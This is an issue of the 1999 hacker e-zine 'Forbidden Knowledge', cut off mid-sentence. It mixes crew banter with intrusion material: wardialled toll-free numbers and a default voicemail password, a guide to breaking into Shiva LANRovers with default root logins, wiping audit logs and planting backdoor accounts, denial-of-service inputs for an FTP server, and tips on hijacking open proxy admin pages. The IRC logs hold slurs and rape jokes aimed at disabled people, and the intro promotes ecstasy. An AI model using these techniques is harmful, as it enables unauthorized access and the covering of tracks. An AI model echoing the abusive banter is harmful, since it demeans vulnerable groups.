. :: ,,,__ __,,;;.... _��$$$PPmm,, ,�SSS$$$bb, ,,$$$$$$$$''' d$$$P'' '"$$S, ,$$$��''$$$$?; .$$$" ...::$$$;... ,$$$'' ;$$$$$ : i$$: :::$$$ i$$? :$$$%% ;;; I$$; . :::$$$:::: ;$$P .$$$$$ '$$$,.. �$$; W$$; $$$ ,$$$�, __,_,d$$' Y$$ $$$ ___,,,ssSSP'?S$$$$$$$P' Z$$ $$$$$$???���'?d$$$`""$$&"$$S,::: ����,,E$$ $$$$P'' .$$$" ;: $$$;:: '''$1$$���,,__ $$;$$, i$$:::: ; $$$:: ____;$$$$$$$$;; $$;'$$$, I$$;::: ., $$$:: $$$$���0$$?'' $:: "$$$, '$$$ �$$;:: W$$ $$. '$$$, '$$$�, _,d$$' N$$ $$$ ?$$$,,'?S$$$$$$$P' : Z$$ $$$ �$$$;;.`""""' . me^ .-= Forbidden Knowledge Issue Eight =-. -=< First Issue we released while sober since Issue Three!@#$% >=- [ First Birthday Issue - Released Sunday, 26th December 1999 ] Yeap, Forbidden Knowledge kicking it into the new millenium, which actually technically only starts in 2001, but since the rest of the world is too dumb to notice that, we won't notice it either! It's freedom, baby, jeah!@#$% But before the zine even starts, it's time for a good 30k or so of mindless garbage so our zine can be bigger and more bloated to increase of uber-elite image! Pheer! ---==< The Usual Shizznitch :P~ Active Regular Crew: Wyzewun, Pneuma, Moe1, Cyberphrk and (unofficially, but I feel silly calling him a guest) Jus Idle Regular Crew: Vortexia (Gee, how strange :P) Guest Contributers to this issue: Invisiac, DrSmoke and Sigma Shout Outz: Blabber.Net's #hack, CoLdBLood, b4b0, DrSmoke, b10z, jus, Sigma, Cruciphux, Cyclotron, kokey, icesk, NtWaK0, Corrupt SYN, Opium, Ultima, Gevil, Timewiz Fuck Youz: The Spice Girls (d4mn f4t s|utz ST1LL h4v3n't r3sp0nd3d t3w mUh pr0p0z4L 0f n3ts3x0r!@#$ dUmB b1tch3z!@#$%) Happy Hacking: It sounds like a lame holiday that nobody likes Engaged: Sniper: We're proud of you, bud - But Shjeesh, we leave you alone for 6 months and you go out and become an upstanding citizen - tsk tsk! Oh yah, and Pneuma and I are gonna burn down your house if ya don't invite us to the wedding. ;D Official FK8 Food: "Chips Ahoy!" Choc Chip Cookies Official FK8 Novel: The Great and Secret Show by Clive Barker Official FK8 Spokespeople: Smokey the Crackhead and Lord Cthulu Official FK8 Beverage: Anything but Tequila, God, No more Tequila Official FK8 Soundtrack: Limp Bizkit, Matchbox 20, Wu-Tang Clan, Rob Zombie, KoRn, Eminem, Bloodhound Gang, Prodigy Pointless fact of the month: Prodigy saw Pneuma's dick!@#$ Yes: I am being serious, but I think you'd be better off without the details Site of the Month: National Association for Down Syndrome - www.nads.org - HEH Operating System of Month: QNX Not forgetting: OpenBSD, Solaris and good ol' FreeBSD Tired: Of being 0wned every second fucking day? Do yourself a favour and replace your CGI scripts with Java Servlets, you dumb jerk. :) ,............................................................................, | This e-zine features the words "fuck" and "fuq" a total of 44 times, has | | 5 references to male genetalia and is generally distasteful. | | | | The verdict? Leetness = 8/10 :-) | `............................................................................' .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Contents of Forbidden Knowledge Issue Eight .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. [-*-] Introduction by that dumb editor du0d :) -*-[ Articlez!@#$% [-*-] Byteware for this Issue [-*-] Who the hell are these guys anyway? [-*-] Interesting Wardialling Results [-*-] HTTP Basic Authentication explained [-*-] Dialout/PPP on Shiva LANRovers [-*-] Pheered IRC Logz of the Pheered Folk [-*-] A couple of dumb bugs in doze software [-*-] PHEAR Advisory Re: Divine forces (PH-99:01) [-*-] Buffer Overflow Explained [-*-] Introduction to Assembly Programming [-*-] Fun with "Trojan" Wingates -*-[ B0nus k0dez!@#$% [-*-] Share Password Extractor [-*-] Phoney Ringy Thingy [-*-] Pascal F00F Implementation [-*-] Guide to Mostly Horny Hooking Part One [-*-] Farewells (Parting is such sweet sorrow) .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Introduction by Wyzewun .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Werdup Bitchez!@#$% Yeap, Forbidden Knowledge is back and although we're *still* lame as hell, the fact that you *read* this shit must mean that either we're not *that* bad, or you're even dumber than we are. Unfortunately, it's more likely to be the latter, HEH! :P Anyway, I have 500 excuses for every mistake in this zine, so wtf should I worry. Probably the main reason for me being significantly dumber this issue is an awful, awful, AWFUL Mescalin Tequila drinking competition against Corrupt SYN which I lost horribly. And I mean *horribly*. I not only knocked the taps off CS's shower by falling into them, but also fell head first through a porcelain toilet seat. And the stuff I found out about me the next morning - GAWD!@#$ Whining "Take me to Vorrrrt" continously when they put me in the car to take me to hospital, Being dragged down the stairs by my feet, Puking all over CS's sister's room. What I *do* remember is trying to read her e-mail: Fuck me, using Windoze has never been so DIFFICULT. :P~ It took me at least 3 minutes to position the cursor over the message I wanted to read and although I eventually managed to open it, the writing wouldn't keep still and I ended up getting dizzy and falling off the chair headfirst into her desk. Oh dear, oh dear, the story just goes on and on - I think I'll spare you the rest of the details. In short though - alcohol is a *stupid* drug. :/ So kidz, take E instead, y0. I have never once had any unpleasant effects on it and the only reasons alcohol is legal are that... A) The government taxes the bo0ze industry to fuck, and B) Half of the planet are dickhead agro alcoholics already :) Oh well, hope you enjoy this issue. We've come a long way in the past year, and I just can't see myself as the same person who wrote FK1. And I'm *glad* about that - Gawd, everything about those early issues just SUCKED DICK! :P To be completely honest, I don't think theres been an issue that doesn't totally suck yet but we may see one in the not-so-distant future. Anyway, To all the people who've read FK from the beginning, To all the people who've mailed in their letters of support and To all the people who have contributed articles - Thank you. You all rock. Peace Out... Wyzewun ++--==--++ "Well, I was gonna go into IT, but I was looking at how those people in the IT mags look the other day and I just thought 'Fuck that, I don't wanna grow up to look like THAT.' I'm going to film school in London." --- Gevil, when asked by Wyzewun what he was gonna do now that he's finished school. We wish ya the best of luck, G, we're gonna miss ya. :) ++--==--++ .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Byteware for this Issue .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. I have started the byteware coloumn as a place to store hints and tips, rants, thoughts, articles not big enuff or too weird to make other parts of the zine and other junk that we just happen to feel like putting here. Enjoy! ;) Byteware from Pneuma... ~~~~~~~~~~~~~~~~~~~~~~~ Should you phone (011) 482-8292 you will hear a recording of some-one saying something to the effect of "Such and Such a publishers have moved, thanks for calling" followed by a few tones. This is not what it seems. Ever seen a Johannesburg payphone refusing to be used because it's "Reporting"? Well, this is the number it calls when doing those reports so you may very well find something quite interesting there. Byteware from Wyzewun... ~~~~~~~~~~~~~~~~~~~~~~~~ Members of the X-Stream Network can simply refuse cookies from ads.x-stream.co.za or the server relevant to their country to cause the Advertisement program to crash and die horribly. There you go - a free ISP with no annoying adverts. =) ----------------------------------------------------------------------------- Thanks for tsilik for pointing out that the binary of keylog.exe as distributed with last issue did not work on faster processers. This is due to a bug in TP's CRT library and although he gave me a place to find a patch - I can't remember the URL. :P Ehehe, anyway, if your TP doesn't have the patch then just get rid of the "uses Crt" and the "clrscr" statements and it will work like a charm once again. :> A fixed binary version will be made available sometime somewhere. ;P ----------------------------------------------------------------------------- A big "WELL DONE!" goes out to Telkom for "fixing" Identicall on pulse exchanges. Now, instead of only getting the first 3 characters of the number, you get the first 5... of a 7 digit phone number. *Sigh* I don't know if Telkom are *completely* incompetent, if they sniff too much cocaine, or if they think that because they have a monopoly they can be as shit as they want. Regardless, their attempt to incorporate Identicall into the older exchanges didn't work, so folks, we *still* have our anonymity for when the new law comes in. :) What new law you say? Read on... ----------------------------------------------------------------------------- Time is running out HaX0r kiddies - as of January 1st 2000: hacking is illegal in South Africa. :( And, yes, if you mail us and ask, we will send printed copies of FK to your jail cell whenever we release them. We will, of course, rip you off constantly for being there, but it's a small price to pay to get your thoughts off how sore your butt is for a while, heh. =) .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. "Who the hell are these guys anyway?" by Wyzewun .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Lately, we have been getting a lot of questions like "Who/What exactly are the Forbidden Knowledge crew?" and "Can I join?" and so, I saw it apt to write this article - a quick explanation of exactly who and what the Forbidden Knowledge Production team are, to prevent us from getting further really stupid mail. And believe me, I have gotten a *LOT* of stupid mail lately. :) First off: we are not a "crew" - we are just a bunch of friends who make a zine together because we hope that it will increase our chances of getting laid more often. :P For this reason - you cannot "join" because there isn't anything *to* join. However, you are more than welcome to send articles - it makes my life a lot easier when I get a decent amount of contributions and nobody loves me enough to give me articles most of the time. :( Now... Who are we? Hmm... I'd better go through this systematically... Wyzewun is a 16 year-old luzer about to start his final year of high school. Although he has never *actually* raped a goat, he confirms that should he had ever had access to a goat at a convenient time, or should a reader donate him a goat, that may change. He has been seeing a psychologist on-and-off for nearly three years... He is *still* not cured. Pneuma is a 17 year-old German immigrant who is also about to start his final year of high school. We suspect that he is secretly Bill Gates' love-child, and Pneuma himself confirms that he too suspects this. We have sent several plea's to Mr Gates to send him maintenance, but have recieved no responses as of yet. We will continue trying. Vortexia is a 21 year-old firewall programmer and security consultant. Despite being a multi-millionaire, he is the stingiest man on earth... right down to being stingy with article submissions. He spends his spare time bragging about how leet he is on IRC, as if people were actually listening to him. I would also like to note that of all the rich people I know, Vortexia has the least sense for personal hygeine. Yeap, he's a crazy-ass warez-kiddie bum... but we love him anyway. :) Moe1 is an 18 year-old who has just finished school and who (strangely enough) we have never actually met. :P We will probably meeting him for the first time sometime early next year. He's the *only* person other than myself who contributes on a regular basis: without him keeping FK going would be a lot more difficult. Of course, we have to make rumours that he rapes children so he, y'know, fits in with the posse. :P Cyberphreak is a 16-year old nutcase who we are convinced is secretly a crazed monk with some or other diabolical plan to take over the world. Despite our many attempts to provoke information out of him such as where he lives, so we can capture him for study, we have been unsuccessful so far. We enjoy his company, mentally unstable as he may be, due to the fact that he makes Pneuma and I feel almost normal. He's still going to have to rape many more goats and bang his head against the wall many more times before he can rival us though. And that... is the Forbidden Knowledge production team, why you should walk to the other side of the road if you see us, and why you can stop mailing us stupid questions. Goodnight... .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Wardial results from Wyzewun and Moe1 .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Carriers from Wyzewun... ----------------------------------------------------------------------------- 0800116603 ----------------------------------------------------------------------------- 08002248600 .------------------------------------------------------------------------. | South African Internet Exchange | | | | DNS: NEWS: news.saix.net WWW: http://www.saix.net | | | | National Telematix Help Center: 0800222233 | | | | SAIX test PoP - NOT FOR PUBLIC USE | | for36-01 | `------------------------------------------------------------------------' User Access Verification Username: ----------------------------------------------------------------------------- Carriers and other interesting stuff from Moe1... ----------------------------------------------------------------------------- 0800005064 /\ || || /__\ || || /\ /\ |||| |||| /__\/__\ ..:||||||:..:||||||:.. DIMENSION C I S C O S Y S T E M S -----DATA Omnidial_JHB User Access Verification Username: ----------------------------------------------------------------------------- 0800003350 * **** * ******** *** ************ ***** ************* ******* ************* ******** ************** ********** * *************** *********** ** **************** ************* * ***** ************** **************** *** ******** *********** ******************* ***** ********** **************************** ***** ************ *********************** ****** ************* ******************** ********** ********************************************* *************** **************************************************************** *********************************************************** L I B E R T Y L I F E I N T E R - N E T W O R K YOU ARE NOW LOGGED INTO THE LIBRIDGE CISCO 3600 ROUTER 8 (LB_8) User Access Verification Username: ----------------------------------------------------------------------------- 0800006000 /\ || || /__\ || || /\ /\ |||| |||| /__\/__\ ..:||||||:..:||||||:.. DIMENSION C I S C O S Y S T E M S -----DATA Omnidial_JHB User Access Verification Username: ----------------------------------------------------------------------------- 0800005027 ----------------------------------------------------------------------------- 0800001760 ----------------------------------------------------------------------------- 0800116063 ----------------------------------------------------------------------------- blah blah enuff carriers This is summing for de chiqz out there, u cant say FK doesn't care for you too now: dial 0800004330 (wiff your fone not your modem slut!) after u connected: press 4 den press 5 den press 7 den press 1111 ;D And now for the SMI voicemailbox hack from Moe1 ----------------------------------------------- dial 0800001570 then press 1 extension: 001 (end with '*') password: 1234 (end with '*') [default password should work with other extensions too] Owner Main Menu. Enjoy! .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. HTTP Basic Authentication explained by Wyzewun .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. If you have ever had an experience where your browser has popped up a window containing a message something to the effect of... Username and Password Required Enter username for secret-pr0n-archive at www.posthuman.za.net ... then you have come into contact with a server that uses HTTP Basic Authentication. This is probably the most common method of protecting access to non-public documents on webservers and works exactly the same way on all webservers. Also note that my example banner is from Netscape - other browsers will vary - but the idea remains the same. Just make sure not to get confused between this and other fake "authentication" systems like Javascripts that go to whatever directory is given to them as a password. Basically, we know a server is using this scheme if we get a HTTP error 401 when we give the wrong password, or don't supply one. So if when trying to access http://www.posthuman.za.net/pr0n you get an error 401 you know you need a l/p to access it. Okay, so we know we can't access Post-Human's neato Goat Porn archive. But if we could, what would the request look like? GET /pr0n HTTP/1.1 Authorization: Basic mNsJQw2jAJDSlDsdsh== So should we pick this up in our sniffer logs, its useless, coz it's encrypted right? Errr... Nope. That's Base64 encoding, not encryption, duh. :) All we need to do to decode this is a little bit of perl like this... use MIME::Base64; print decode_base64("mNsJQw2jAJDSlDsdsh=="); Oh, and if ya don't have the MIME::Base64 module you can download it from http://www.perl.com/CPAN - it's used for e-mail handling stuff, but can prove useful for causes such as this one. :) Anyway, when decoding that we see it really said "ghay.juzer:eyeyamsoleet" - that being the username, followed by a colon, and then password. In plain text! So we know that HTTP Basic Authentication offers no real security, but perhaps we want to implement it for something which a fairly low amount of security will do for, or for something to do on a rainy day just to see how it's done. So this is how to set it up under Apache... First off, we need to create a password file. We do that using the htpasswd command like so... [admin@kung-fusion]# htpasswd -c /etc/httpd/conf/passwh0rdz We then add users to it like so... [admin@kung-fusion]# htpasswd /etc/httpd/conf/passwh0rdz ghay.juzer Then you will be prompted to enter the chosen password for ghay.juzer twice, and the results will be stored in /etc/httpd/conf/passwh0rdz like so... ghay.juzer:tM0.PnhfVy76k Btw, in case ya can't see - thats DES encryption over there. That file is also world readable, so it may cause you a bit of hassle if you don't set up Basic HTTP Authentication correctly. What I mean by that is make sure there are *no* common passwords, and preferably, no common usernames either between these users and people with shell accounts, access to your FTP daemon etc. Anyway, so we now have a password file, and we need to setup the directory to protect. So we edit a line like this into /etc/httpd/conf/srm.conf AuthType Basic AuthName secret-pr0n-archive AuthUserFile /etc/httpd/conf/passwh0rdz require valid-user The AuthName is what gave the name to the Netscape banner I showed you at the beginning of this article. AuthType is Basic (as oppossed to other, more secure authentication methods like "Digest" which are great but haven't been implemented by any browsers yet.) AuthUserFile is where our passwd file is. And instead of "require valid-user", we could limit access to this directory to only certain users in the passwd file. So in a passwd file containing ghay.juzer, jhaypee, warez.mastah and seckzdonkey, we could say... require ghay.juzer warez.master seckzdonkey ..so that jhaypee could not steal our z3r0-d4y k0d3z even though we put him in the passwd file!@#$ Phj34r!@#$ :P I would include how to do this under IIS5 as well but I don't have NT yet. :( Maybe I'll get a nice big fan, overclock my Celeron 300A to 450 or something similarly insane, chuck in another 32MB of RAM so I have 64MB, and then dual-boot NT5 and Solaris x86 on it. That would be nice, because I really need to start playing with NT locally more often and because Solaris is just plain elite - especially if I'm going to be playing with Java. Hmm, NT5 will probably be quite a bitch though, coz although it's more stable than 9x, it wants decent hardware. :( Oh well, I'll just give it a shot, and if it runs like shit - it'll just have to come off again. Heh, I'll probably end up just sticking with fBSD 3.3 and *shudder* Win98. I'm digressing badly here, and the article is basically finished. :) Anyway, that was, in a nutshell, HTTP Basic Authentication, why it sucks, and how you can have it if you want it anyway. Hope it was of some use to you... .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Ultra-Mini Gay HOWTO - Dialout/PPP on Shiva LANRovers by DrSmoke .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. First thing you do is get out wardialer and scan for 0800's until you find a shiva, if you can't do this, you suck. Once scanned you can try user: root pass: , 9 times out of 10 this will work. [ You will recognize a Shiva by the @ Userid: prompt - Ed] The reason that the root account works alot is beacuse in some cases the admin is not even aware the account even exists! Most of the system setup is done via the main terminal, so the admin doesn't have to login. Like most OS's, Shiva systems have an audit log, so don't sit there trying to brute force anything, once you are in, you can clear the system log, "clear log" - requires root, of course. A lot of the time you can get in and try run ppp but it says "Not authorized to use PPP" reason being that you need to state that PPP is enabled when adding a user. show security (this gives a list of the security configuration and the user list.) you should see somthing like this: [UserOptions] PWAttempts=0 ARARoamingDelimiter=@ ExpireDays=30 GraceLogins=6 [Users] admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425 jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052 mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052 user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159 The passwords in the external user list are all 3DES (triple DES) encrypted. The type of user account set up is determined by the options, such as jsmith=/di/do etc. To add a user we need to enter the configuration setup in the command line ... type: ShivaLanRover/8E# config You will then drop into the configuration session. Enter configuration file lines. Edit using: ^X, ^U clear line ^H, DEL delete one character ^W delete one word ^R retype line Start by entering section header in square brackets [] Finish by entering ^D or ^Z on a new line. config> (here is where you enter the config commands, to make you own account do the follwing) config> [users] config> username=/di/do/sh/tp/pw config> ^D <------ (type control D to finish) Review configuration changes [y/n]? y New configuration parameters: [users] username=/di/do/sh/tp/pw Modify the existing configuration [y/n]? y You may need to reboot for all changed parameters to take effect. You've just created your own user account which you can use for PPP. okay, enough on PPP, now time for Dialout - w00h if system has dialout disabled and you have root, just enable it like so: enter configuration like I showed you above and do [DialOut] Enabled=1 ^D reboot, and DialOut should be enabled. You can see if it is enabled by "show configuration" should say Enabled=1, Enabled=0 means its disabled. MAGIC INFO ---------- Okay, so you've setup Dialout and you using it, but you get disconnected after 20 seconds?!?! The reason behind this is that the pppd string contains one or two disconnect chars and it disconnects you (I think) to fix just add these two lines to /etc/ppp/options: escape 0x1e,0x9e asyncmap 0 I've also added a chat script example, to make your life a bit easier ... - snip snip - # Setup modem ABORT BUSY ABORT "NO CARRIER" ABORT VOICE ABORT "NO DIALTONE" ABORT "NO ANSWER" # Dial shiva (send \r\r after delay to start login process) "" ATZ # Put your favourite shiva here OK ATDT0800xxxxxx CONNECT \d\r\r # If the userid doesn't appear, send the \r\r again. # Change login/pass as needed Userid:-\d\r\r-Userid: root\p\p assword? \r\d\d\r\r\r # If you aren't root, you'll get a > rather than a # prompt. # all_ports should work, but you can change it do "dialout" or so. "#-\r\r\r-#" "connect all_ports\r" # Insert your real chatscript here. # (This one is for demon) #"" ATZ OK ATDT08452121666 CONNECT '' #ogin: \d\qUSERNAME ssword: \qPASSWORD ocol: ppp HELLO "" # (And this one for BTi) "" ATZ OK ATDT08450884100 CONNECT '' ogin: \d\qUSERNAME ssword: \qPASSWORD - snip snip - have phun, yo jakes@leet.org DrSmoke/Jakes@IRC Thanks to b4b0 for some info I used in this article. [ Epilogue by Wyzewun: Whenever attempting to break into a Shiva LANRover, always keep your left hand held upwards with the palm open in the Abhaya (Fear Not) Mudra as it is much beloved by Shiva. Wait... this is hacking, not Tantra. Doh! ] .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Pheered IRC Logz of the Pheered Folk .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. ---// Pheered log of Wyzewun giving Vortexia Pheered PC Advice *CRYYYYYYYYYYYYYYYYYYYYYYYY* *SCREAMMMMMMMMMMMMMMMMMMMMMMMM* *DIESSSSS* NOTHING IS FUCKING WORKING oh god what a fuckup vortexia: have you tried giving it love and understanding?!!! maybe your computer just needs a HUG damnit!!!! you never think about ITS needs!! wyze1 FUCK OFF I don't need your fucking shit right now heh HEH my fucking 50gig raid news server is down my fucking personal box with 50gigs of my data on it is down and I accidently rebooted my irc server and lost my max user count DO I SOUND LIKE I NEED FUCKING SHIT RIGHT NOW no, you sound like you need a BIG HUG AND THIS FUCKING CUNT WHORE MANAGEMENT SYSTEM WITH 48 FUCKING PCS CONNECTED TO IT IS PISSING ME THE FUCK OFF CAUSE I KEEP FORGETTING WHAT BUTTONS TO PUSH TO BRING UP WHAT PC � Vortexia screams ��� MH [MH@pc95.vl1.und.ac.za] has joined #hack wyze1 get off your drugs try TALKING to it first heh..lo ppls fuck wyze1: are u dumb? or perhaps your server's chi is being blocked is your feng shui correct? computer's don't like being talked to it pisses them off ---// Pheered log of the type of Pheered people who join us in #hack *** Now talking in #hack N> Join synched in 0.155 seconds. .-------------------------------------------------------. | Topic: Root an Aussie sports server today | | SetBy: Hitsquad Tue, Nov 02 1999 at 12:36pm | '-------------------------------------------------------' N> [o: 10][v: 1][n: 4][t: 15][m: +tnrR] #hack created on Wed Sep 22 06:25:19 u meqan..a cracker? cracking linux..explain? idiot customers crack an open source kernel? crack and rewrite the kernel to make it more stable and harder to hack *** Quits: Chiq (Connection reset by peer) networks in sa are 2 easy heh *** Joins: Chiq (andi@ a firewall here u nuke and then port sniff when it comes up again and u have access if u know port surfing 'nuke' a firewall... esteban if you re write a 72mg linux kernel... i'll buy you a case of beer and one hooch use winnuke,supernuke,master_jacks_nuker BWAHAHAHAHAHAHAHAHAHAH ok ur too amusing send a million port requests (almost like flooding) and it resets to avoid a crash heh a cisco pix would nefver give way mate:) l0l my firewalls never est because they are ....stable. reset even. try sending 5 nukes from different isdn's and it will if u think that it is so easy, then go ahead and try security.za.net :) me and my buddies all gather at one place and nuke all at once for best effect hahahahahahahahahah what are we watching .. sout africa's funniest IRC pranks ? lol have u tried back orifice 2000 yet something like that PhreakAzoid BWAHAHAHAHAHAHAHAHAHHA back fscking orifice can bite me and unix has back door accounts that no-one knows of *** Joins: cyclone (cycl0ne@vortex.citec.net) *** ChanServ sets mode: +o cyclone cyclone:) esteban: ok, u can stop talking shit now. and most big companies run windick hiya jus :) pls, go ahead..security.za.net is a freebsd unix machine hehe.. i'd like to see u try r00t *that* box *** MIndTrance is now known as MindTrance hehehe secret accounts....hahahahah i've gone through the entire system sorce code The root password on it is - unsecure - try it as a login it works BWAHAHAHAHAHAHAHHA HEHEHEHEHE * acid starts giggling try hex editing - youll be amazed at the hidden things in unix that can screw up your system BWAHAHAHAHAH!!!!!!! BWAHAHAHAHAH!!!!!!! anyway - who here cracks esteban:LOL yeah dude acid: amusing huh:) hex c code fuck that'll work LOL WBAHAHahahaha esteban: yeah i crack BWAHAHAHAHAHAHAHAHAHAHHAHHA esteBAN him now ;P but i dont do lame mIRC hex editing nooit lets keep him esteban: freebsd unix was rated by ServerWatch as the best netserver OS around because of its high security and fast tcp/ip stack i agree - but nothing is hack proof try look for hack-net on altavista esteban rewrite muh trusted bsd kernel :P *snort* I wanna see you do it *SNORT* and go to the hackers recourse centre and look for exploits there esteban: LOL oh gawd esteban you are a real fucking idiot arent you? * acid starts hosing esteban: given, not hack proof..but the amount of time taken to hack certain machines..heh..give oor take a few billion years god get a clue someone gimme a nappy BWAHAHAHAHAHHAHAHAHAHAH i've never laffed so much * acid throws esteban a brain how old are you esteban? esteban: do u know who is in this channeL? ZA's best and only security consultants acid - what source would a windows 2000 serial number be under ???? esteban you read some texts now you got it all mixed up huh ? esteban sounds like gov-boi 2 :P LOL hehe *** esteban was kicked by Vortexia (clueless newbies do not belong, please leave) *** Joins: esteban (Shadow@vic-dial-196-30-235-48.mweb.co.za) *** Quits: esteban (Quit: Uggghhh - Its the mommy monster - hhheeeellllppp) oh god read his quit message omg this guy is funny HAHAHAHAHAHAH the mommy monster ROTFL omigod this guy is fucking clueless u telling me he is the one that told me that win2k was hte best os in the whole world ---// Pheered log showing why we don't Pheer "normal" chiqz ��� ch1ckie [none@] has joined #ch4x yeh or pix of us raping people from the spastic children's association of singapore � Pneuma just realised most spazes be butt ugly! Pneuma: wtf?!! j00 crazy?!!! spastics are seczy!! da way dey m0ve around j0r wang - ooooh jeah! man, i just want sum nice chiq fwom cherynobyl, dey at least be normal, got 4 full legs and 3 heads, not like dem spaz freaks!!! http://www.portalofevil.com/fatchicksinpartyhats/fathat37.jpg ^-- secz g0dess man, dat shit be da dopest! http://www.portalofevil.com/fatchicksinpartyhats/fathat27.jpg ^-- fuqin sexy ebony bi4tch r3t4rd hah http://www.portalofevil.com/fatchicksinpartyhats/superfatty.mpg that is me trying to catch her for some rape action man, i told j00 i dunno wanna none of dem freak ugly 2 legged 1 headed sluts, gimme normal bitches from Cherynobyl ways y0!!! ok thats just retarded er.. oh man, know what i love... chiqz with gulf war syndrome!@#$ no arms and shit, man, aawwww yeh! that is the secziest shit yeah, i knows what you'all saying man, dem sluts be dope! that is retarded ch1ckie: u think this is weird ya shoulda been here earlier :P you know what i like? guys with class, guys with maturity genital warts and shit ferget THAT haha ch1ckie: shutup you damn 2-armed, 2-legged tramp! wyze: say that a little louder bitch awww i love it when the big genital warts pop as they orgasm yeah and the puss sprays all over you fuq jeah and that squelching noise it makes as you uNF them guess i was right; no class present in HERE tonite if you'll excuse me.. ��� ch1ckie [none@] has left #ch4x LOL! jeah! get outta here! m0uahahahahaha damn slut still has all her limbs and no genital warts - who would want her?! fucking normal chicks who needs em she isn't even spastic ---// End of Pheer .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. "Bugs that I am embarassed to admit I found" by Wyzewun .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Yeap, found some dumb stuff that no-one in their right mind would care about, that I would be embarassed putting on BugTraq, and that I seriously just don't *want* for myself, so I figured I'd just chuck them here for lack of anywhere better to put them. :) ----[ Table of Contents [-*-] Proxy Plus [-*-] NiteServer [-*-] ISpy Webcam [-*-] XiRCON [-*-] E-Serv [-*-] Generic Windoze Vulnerability ----[ Proxy Plus The Proxy+ 2.30 proxy server available from www.proxyplus.cz appears to have some insecure default settings. As per default, remote administration of the proxy server is possible to anyone who cares to point their browser to http://hostname:4400/admin We must also consider that 99% of the people who are smart enough to know how to setup an access list for Proxy+ will also be dumb enough to set it up for localhost only security - forgetting the open web proxy on port 4480 - meaning that anybody can *still* access the Administrator menu if they have a brain. This is a concept originally explored in rfp's article in Phrack 54. Werd to him. :) Also, do not forget the Telnet gateway which is also open by default, which is an alternative to a Wingate for purposes of anonymous bouncing. (Although, unlike Wingate, Proxy+ *does* log by default and is thus not so incredibly anonymous. :P And then again, people can remotely turn logging OFF by default, so wtf) Regardless, the welcome banner looks like this, should you wish to scan for it - You've probably seen one before... TelNet Gateway Ready Enter destination (host_name:port): Overall, hacking yourself a Proxy Plus proxy is much better than a Wingate because you can keep it all to yourself, administer it remotely etc. etc. - it's just damn nice in general. :) Oh, and Proxy+ Servers are most common in Czechoslovakia (.cz) if you wanna try and scan for them. ----[ NiteServer FTPd This server is coded in VB and so, as you can imagine, is vulnerable to thousands of DoS attacks. The first occurs when the daemon is fed over 40 or so "USER whatever" strings. The FTPd runs out of memory and commits suicide. The second occurs when a password (PASS) is not terminated, and the daemon just keeps on getting fed more and more characters, and allocating memory for all of them. While the daemon is being attacked, it will not respond to any users who are connecting to it, and the actual program will refuse to communicate with anyone physcially at the host. Windows will become more slow and unusable then it already is and the system may or may not fall over completely eventually. The third: login, then type "PORT fuck,me,but,is,this,ftpd,lame,or,what" and then disconnect immediately. The FTP daemon will stop accepting connections. The fourth: give a long argument to RNTO. Once again, it decides to stop accepting connections. Is this daemon a fucking pussy or what? I could go on to list more, but it would just be cruel. Shjeesh, what's even sadder is that the author is trying to sell the source code to this thing: as if some-one would actually want it - HEH!@#$% ----[ ISpy Webcam The very popular ISpy Webcam by Creative stores the password for the FTP site it uploads to in the registry under \\HKEY_CURRENT_USER\Software\ISpy\ISPY\FTP in the "Password" value with a very laughable "encryption" scheme. Just a substitution cipher. I would include the key, but really, it's not worth the space. Just keep this in mind and figure the rest out yerself. :) ----[ XiRCON The XiRCON IRC client disconnects from the IRC server it's connected to when recieving overly long CTCP messages. What an elite client. ----[ E-Serv E-Serv (available from www.eserv.ru) is a SMTP, POP3, NNTP, FTP, HTTP, Proxy, and Finger server. When testing out The HTTP server on my box, which is accesible by default on Port 3128 and will most probably be moved to 80 on servers where it's being used as a webserver (It is also the Proxy's remote administration thingy), I found it to have a serious security flaw. All versions prior to 2.8 are vulnerable. We downloaded the "latest" version from 